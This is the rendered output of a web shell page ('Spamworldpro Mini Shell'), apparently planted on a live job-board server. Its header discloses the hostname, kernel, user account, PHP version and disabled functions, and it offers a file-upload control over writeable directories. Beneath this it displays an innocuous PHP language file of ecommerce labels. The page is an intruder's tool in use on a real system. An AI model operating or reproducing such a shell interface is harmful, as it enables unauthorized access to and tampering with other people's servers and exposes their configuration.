Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/job-board.corals.io/Corals/modules/Ecommerce/resources/lang/en/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/job-board.corals.io/Corals/modules/Ecommerce/resources/lang/en/module.php
<?php

return [
    'ecommerce' => [
        'title' => 'Ecommerce'
    ],
    'attribute' => [
        'title' => 'Attributes',
        'title_singular' => 'Attribute'
    ],
    'brand' => [
        'title' => 'Brands',
        'title_singular' => 'Brand'
    ],
    'cart' => [
        'title' => 'Cart',
        'title_singular' => 'Cart'
    ],
    'category' => [
        'title' => 'Categories',
        'title_singular' => 'Category'
    ],
    'checkout' => [
        'title' => 'Checkout',
        'title_singular' => 'Checkout'
    ],

    'coupon' => [
        'title' => 'Coupons',
        'title_singular' => 'Coupon'
    ],
    'order' => [
        'title' => 'Orders',
        'title_singular' => 'Order',
        'update' => 'Update Order'
    ],
    'wishlist' => [
        'title' => 'Wishlists',
        'title_singular' => 'Wishlist',
        'item' => 'Wishlist Item'
    ],
    'product' => [
        'title' => 'Products',
        'title_singular' => 'Product',
        'media_title' => 'Media'
    ],
    'shipping' => [
        'title' => 'Shipping Rules',
        'title_singular' => 'Shipping Rule',
        'index_title' => 'Shipping'
    ],
    'shop' => [
        'title' => 'Shop',
        'title_singular' => 'eCommerce Settings'
    ],
    'sku' => [
        'title' => 'SKU',
        'title_singular' => 'SKU',
        'product_title' => ':product SKU',
    ],
    'tag' => [
        'title' => 'Tags',
        'title_singular' => 'Tag'
    ]


];

Spamworldpro Mini